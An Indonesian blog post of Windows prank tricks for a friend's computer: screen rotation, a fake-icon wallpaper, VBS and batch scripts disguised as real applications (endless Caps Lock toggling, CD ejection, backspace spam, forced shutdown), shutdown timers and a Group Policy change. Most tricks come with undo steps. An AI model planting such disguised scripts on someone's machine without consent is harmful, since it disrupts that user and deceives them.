-->

Cara ampuh menjahili komputer teman tanpa perlu menggunakan aplikasi

Memiliki teman yang jahil itu emang menyenangkan dan kadang juga bikin sebel, kehadiran teman yang suka jahil itu selalu di nanti karna dengan ulahnya semuanya menjadi lucu dan suasana akan menjadi lebih berwarna. Kali ini saya akan share tips dan trick menjahili  komputer teman, cara ini cukup mudah dan simple untuk dilakukan dan di jamin komputer teman akan terjahili, sebelum mencoba tips dan trick ini diharapkan sobat memiliki kecepatan lari yang cukup kecang, hal ini dilakukan untuk mencegah sobat dilempar dengan benda di sekitar oleh teman sobat. Jujur saja admin termasuk orang yang suka jahil bahkan terkadang admin sampai di hajar seluruh wanita dikelas, gara-gara suka mengambil password sosmed teman, namun saya tidak akan menjelaskan tips dan trick yang satu ini. Tips dan trick kali ini tidak akan membahayakan komputer sobat, jadi sobat bisa mencobanya dengan aman. Gunakanlah cara ini dengan bijak, agar tidak ada ada persilisihan di antara teman sobat maupun sobat sendiri.
 


1. Cara membuat tampilan Destop Komputer terbalik 

Cara membuat tampilan Destop Komputer terbalik

Cara ini cukup mudah dan bahkan simple banget untuk dilakukan, Dengan trik ini, tampilan laptop teman sobat akan berubah menjadi terbalik. Tanpa perlu software atau aplikasi khusus, cara ini bisa dilakukan ke semua versi Windows. Kamu bisa lakukan trik ini kapan saja dan dimana saja. Kamu bisa merotasi tampilan laptop teman kamu menjadi terbalik ke samping kanan dan juga kiri dengan cara menekan tombol kombinasi CTRL + ALT + Arah (Left, Up, Right, dan Button) dan Untuk mengembalikan tampilan destop dengan menekan tombol CTRL + ALT + UP . Tidak semua komputer bisa melakukan hal ini, mungkin cari ini hanya cocok bagi pengguna VGA Intel yang Integrated. 

2. Cara Memanipulasi atau Mengecoh tampilan Destop  
Cara ini cukup mudah juga untuk dilakukan dan cukup ampuh untuk mengecoh teman sobat, cara ini akan memanipulasi tampilan destop awal komputer, sehingga saat teman sobat mengklik aplikasi, aplikasi itu tidak akan berjalan karna pada dasarnya itu hanya sebuah gambar yang mirip dengan aplikasi.
  • Pertama tekan tombol  "PrtScSysRq" pada keyboard tombol ini biasanya berada dibagian atas keyboard, sebelum menekan tombol sobat harus pergi ke tampilan utama destop, lalu kemudian menekan tombol itu. Jangan lupa juga untuk menyembunyikan Mouse.
 tekan tombol  "PrtScSysRq"
  • Kemudian simpan hasil screen shot gambar tersebut, dengan membuka aplikasi microsoft word lalu paste gambar tersebut dengan menggunakan tombol CTRL + V lalu simpan gambar tersebut dengan cara mengklik kanan pada gambar tersebut lalu pilih "Save As Picture" simpanlah ditempat yang aman namun sobat mengetahui, jangan lupa untuk memilih format JPEG File Intercharge Format.
Cara Memanipulasi atau Mengecoh tampilan Destop
  • Kemudian kembali lagi ketampilan utama destop, klik kanan => Pilih View => Hapus tanda centang pada Show destop icon, sehingga aplikasi yang terpampang akan menghilang.
  • Silahkan cari kembali gambar screenshot yang tersimpan tadi, jika sudah ketemu silahkan di jadikan tampilan utama destop, dengan cara klik kanan pada gambar tersebut lalu pilih "Set As Destop Background".
Cara Memanipulasi atau Mengecoh tampilan Destop
  •  Tampilannya nanti akan berbentuk seperti gambar diatas.
Jika sudah tinggalkan Komputer tersebut dan tunggu atau pantau komputer teman sobat dari kejauhan, jika dia mulai panik atau gelisah berarti misi sobat untuk memanipulasi gambar berhasil.

3. Cara menjahili komputer teman menggunakan Notepad
Dari sekian banyak cara menjahili komputer teman, aku paling suka menjahili komputer teman menggunakan Notepad karna caranya yang mudah dan simple untuk dilakukan dan cara ini sangat ampuh untuk membuat teman sobat melempar benda di sekitarnya kepada sobat, cari ini akan lebih spesial lagi karna di jamin pasti di klik tuh Aplikasi Notepadnya tanpa kita sendiri yang mengkliknya, jadi sobat masih bisa kabur. Dan ingat gunakanlah cara ini dengan bijak, jail boleh asal tetap menjaga emosi.
  • Pertama pilih script di bawah ini, ada bermacam-macam script untuk mengerjai komputer teman, jadi pilih salah satu dulu.
 @echo off
msg * Komputer anda saat ini dalam keadaan baik-baik saja
msg * Teman-taman anda lagi mengerjai anda
shutdown -s -c “Komputer anda mati” 

Simpan Note pad dengan menggunakan Format.bat

 Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop  

 Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop
 

 Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop
 

 MsgBox "kembali ke menu sebelumnya"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop 

 Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "http://samsoftware-cyber.blogspot.com"

loop 

  • Simpan salah satu script di atas di bagian Destop dengan Format .vbs contoh jail.vbs kecuali cara paling atas, cara diatas itu menggunakan format .bat contoh shutdown.bat.
  • Sekarang membuat tampilan Notepad tersebut terlihat seperti aplikasi aslinya dengan cara
  • Klik-kanan pada Shortcut aplikasi palsu tersebut > Properties > Shortcut > Change Icon.
  • Lalu klik Browse dan cari gambar aplikasi apa yang ingin sobat buat gambar, dengan masuk ke local disk C/Program Files/ dan cari aplikasi apa yang ingin sobat buat gambar pengecoh.
  • Jika sudah kemudian klik Ok untuk menyimpan pengaturan tersebut. Dan langkah terakhir yang harus Anda lakukan adalah menamai Shortcut aplikasi tersebut sesuai dengan nama aplikasi aslinya.
  • Jika cara diatas sudah dilakukan, maka yang sobat lakukan adalah menunggu aplikasi itu di klik oleh teman sobat.
Berikut ini cara untuk mengembalikan atau menormalkan lagi komputer teman sobat
  • Buka TASK MANAGER dengan cara  menekan CTRL-ALT-DELETE secara bersamaan kemudian pilh TASK MANAGER.
  • Atau menggunakan RUN dengan menekan tombol Windows + R lalu ketik "taskmgr". 
  • Setelah terbuka TASK MANAGER cari name dengan nama wscript.exe atau Microsoft Windows Based Script Host pada tab PROSES kemudian klik kanan dan pilih END PROSES.
  • wscript.exe untuk Windows 7 dan Microsoft Windows Based Script Host untuk Windows 8.
Setelah itu hapus file tersebut, dan komputer teman sobat akan kembali menjadi normal lagi.

4. Cara menshutdown otomatis komputer melalui cmd
Cara ini sangat sederhana sekali untuk di lakukan, sobat hanya melakukan perintah pada cmd, jika sudah tidak tinggalkan komputer teman sobat, dan lihat reaksinya saat melihat timer otomatis shutdown/restart/logoff, perintah ini tidak akan bisa di close kecuali sobat memberikan perintah lagi pada cmd. Cara ini cukup ampuh membuat wanita memohon agar di berhentikan timer otamatis shutdownnya, sobat bisa berlagak sombong atau apalah, tapi gunakalah cara ini dengan bijak.
  • Pertama buka cmd/command prompt dengan mengklik Start => All Programs => Accessories => lalu pilih  command prompt atau bisa juga dengan menekan tombol Window + R pada keyboard, lalu masukan perintah cmd pada kolom yang tersedia dan Klik Ok.

run

  • Jika cmd/command prompt sudah muncul masukan perintah dibawah ini, pilih salah satu aja.
cmd/command prompt

shutdown -s  -c "Komputer kamu akan shutdown" -t 3600 untuk mematikan Komputer
shutdown -L -c "Komputer kamu akan Log Off" -t 3600     Untuk Log Off Komputer
shutdown -r -c "Komputer kamu akan restart" -t 36000    untuk Merestart komputer

shutdown /s  /c "Komputer kamu akan shutdown" /t 3600  untuk mematikan Komputer
shutdown /L /c "Komputer kamu akan Log Off" /t 3600    Untuk Log Off Komputer
shutdown /r /c "Komputer kamu akan restart" /t 3600    untuk Merestart komputer
  • Masukan perintah di cmd seperti gambar dibawah ini lalu tekan tombol Enter, jangan lupa untuk mengatur waktunya. aturlah waktunya sesuka hati, silahkan ubah angka di dekat -t atau /t yakni yang 3600, hitungan ini menggunakan satuan detik jadi jika 3600 berarti itu waktu satu jam.
  • Sobat bisa menulis ulang pesan apa yang akan disampaikan sesuka hati di bagian yang diberi tanda "bla-bla". 
cmd/command prompt
  • Dan untuk Windows Xp nanti akan ada tampilan seperti ini.
shutdown Windows Xp
  • Dan untuk Windows 7 dan 8 akan ada tampilan seperti ini.
shutdown Windows 7 dan 8
  • Atau sobat bisa juga langsung melakukan perintah di Run dengan menekan tombol windows + R di keyboard , jadi sobat tidak perlu menggunakan Cmd lagi untuk melakukan perintah shutdown timer, sobat bisa melakukan perintah seperti di atas, atau bisa juga melakukan perintah seperti di bawah ini.

at 09:30 shutdown -s  -c "Komputer kamu akan shutdown untuk mematikan Komputer
at 09:30 shutdown -L -c "Komputer kamu akan Log Off"  Untuk Log Off Komputer
at 09:30 shutdown -r -c "Komputer kamu akan restart"  untuk Merestart komputer

at 09:30 shutdown /s /c "Komputer kamu akan shutdown"  untuk mematikan Komputer
at 09:30 shutdown /L /c "Komputer kamu akan Log Off"   Untuk Log Off Komputer
at 09:30 shutdown /r /c "Komputer kamu akan restart"   untuk Merestart komputer
  • Silahkan di Atur waktunya sesuka sobat yakni di bagian "at 09:30", dan sobat bisa menulis ulang pesan apa yang akan disampaikan sesuka hatinya di bagian yang diberi tanda "bla-bla".
run
  • Karna ini tidak bisa di close maka sobat harus melakukan perintah "shutdown -a" untuk Windows XP atau "shutdown /a" untukWindows 7 dan 8, Hal ini dilakukan untuk membatalkan perintah shutdown. Sobat bisa melakukan perintah di Cmd maupun di Run.
run

Jika sobat telah berhasil melakukan perintah di atas, yang perlu sobat lakukan adalah meninggalkan komputer teman sobat, dan  menunggu reaksi apa yang terjadi.

5. Cara menghilangkan tombol shutdown,Restart, Hibernate, dan Sleep
Cara ini adalah cara paling licik mengerjai teman, dan cara ini juga paling ampuh membuat temanmu menjadi stress dan panik. Tips dan trick ini cukup mudah dan sangat cepat untuk dilakukan, sehingga sobat, memiliki waktu untuk kabur.
  • Pertama tekan Tombol Windows + R pada keyboard, setelah muncul Run masukan "Gpedit.msc"pada kolom yang tersedia lalu klik ok.
run
  • Nah setelah terbuka Local Group Policy Editor. Klik Administrative Templates lalu klik Start Menu and Taskbar. Kemudian double klik pada Remove and prevent access to the Shutdown, Restart, Sleep, and Hibernate Commands.
Gpedit.msc
  • Setelah itu akan muncul pilihan 'Remove and prevent access to the Shut down, Restart, Sleep, and Hibernate Commands', ubah pilihan dari Not configured menjadi Enabled, lalu klik OK.
Remove and prevent access to the Shut down
  • Setelah sobat menjalankan langkah-langkah di atas, maka tombol Shutdown, Restart, Hibernate, dan Sleep akan menghilang.

 tombol Shutdown, Restart, Hibernate, dan Sleep

jika sudah begini tinggalkan komputer teman sobat, dan pantau dari kejauhan, dan tunggu ekspersi apa yang akan muncul pada teman sobat. Dan untuk menormalkan kembali, sobat hanya perlu mengubah pengaturannya lagi dari "Enabled" ke "Not configured" lalu klik ok.

Baca juga: "inilah ciri-ciri komputer yang terkena infeksi virus" 

Nah itulah beberapa tips dan trick menjahili komputer teman, namun gunakanlah tips dan trick di atas dengan bijak, Jangan sampai sobat bertengkar dengan teman gara-gara masalah ini. Dan selamat mencoba semoga sukses......!!!!
Hormatilah orang lain maka orang lain akan menghormatimu, berjalan kamu dengan rendah hati maka kamu akan memiliki seribu teman.
Sekian dari tips dan trick kali ini jika ada yang sobat tidak mengerti atau ingin menambahkan silahkan komentar dibawah ini terima kasih.

Berlangganan update artikel terbaru via email:

0 Response to "Cara ampuh menjahili komputer teman tanpa perlu menggunakan aplikasi"

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

close
Banner iklan disini